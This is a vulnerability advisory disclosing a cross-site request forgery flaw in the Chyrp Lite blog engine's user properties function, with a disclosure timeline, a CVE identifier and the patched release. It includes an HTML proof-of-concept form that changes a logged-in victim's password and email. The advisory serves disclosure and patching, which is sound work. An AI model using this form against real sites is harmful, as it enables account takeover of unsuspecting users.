Product: Chyrp Lite
Vendor: Open source community
Version: 2016.04 “Lago” and earlier
Category: Cross site request forgery (CSRF)
Vendor Notified: 2017-01-05
Patched: 2017-01-06
Disclosed: 2017-03-06
Researcher(s): Carl Pearson
CVE: CVE-2017-1000008

A cross-site request forgery (CSRF) vulnerability exists in the user properites function of the Chyrp Lite blog engine. An unauthenticated remote attacker can exploit the vulnerability by tricking authenticated users into visiting a webpage under attacker control.

Proof of Concept
Example HTML attack form:
[code language=”html”]
<!– The form submits when this button is clicked. –>
<button onclick="document.csrf_form.submit()">Click to run</button>
<!– Edit the ‘action’ attribute to reflect the IP address or hostname of the victim’s Chyrp install. –>
<form name="csrf_form" id="csrf_form" method="POST" action="http://[host]/?action=controls">
<input class="text" type="text" name="login" value="user" id="login" disabled="disabled"/>
<input type="text" name="full_name" value="" id="full_name" tabindex="1"/>
<input type="text" name="email" value="[email protected]" id="email" tabindex="1"/>
<input type="text" name="website" value="" id="website" tabindex="1"/>
<input type="password" name="new_password1" value="apple" id="new_password1"/>
<input type="password" name="new_password2" value="apple" id="new_password2"/>

If successful, an attacker can arbitrarily change the user’s password, email, and username to any desired values.

Chyrp Lite version 2017.01 “Swainson” patches this issue. Updating any existing Chyrp Lite installs is recommended.

Project home:
v2017.01 release notes:
OWASP CSRF overview:

Edit 7/13/17: CVE identifier added.

Categories: Advisory

Leave a Reply

Your email address will not be published. Required fields are marked *